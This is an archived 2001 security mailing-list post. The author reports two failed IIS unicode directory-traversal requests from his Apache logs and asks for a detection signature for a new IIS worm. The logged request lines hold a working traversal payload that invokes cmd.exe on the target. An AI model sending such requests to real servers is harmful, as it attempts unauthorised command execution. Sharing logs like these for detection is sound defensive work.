hi all, i found these in my apache logs after a quick check: 209.250.131.60 - - [10/Jun/2001:17:50:29 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 231 209.250.131.60 - - [10/Jun/2001:17:50:30 -0400] "GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 246 in a nutshell, plain old unicode directory traversal attempts. (failed, obviously.) normally i would have dismissed these as 'kids', but these reports on a new IIS worm have me wondering if anyone has a signature for the scans it does: http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html http://www.security-informer.com/ic_620113_3494_1-3283.html thanks. ____________________________ jose nazario joseat_private PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 PGP key ID 0xFD37F4E5 (pgp.mit.edu)
This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 13:24:12 PDT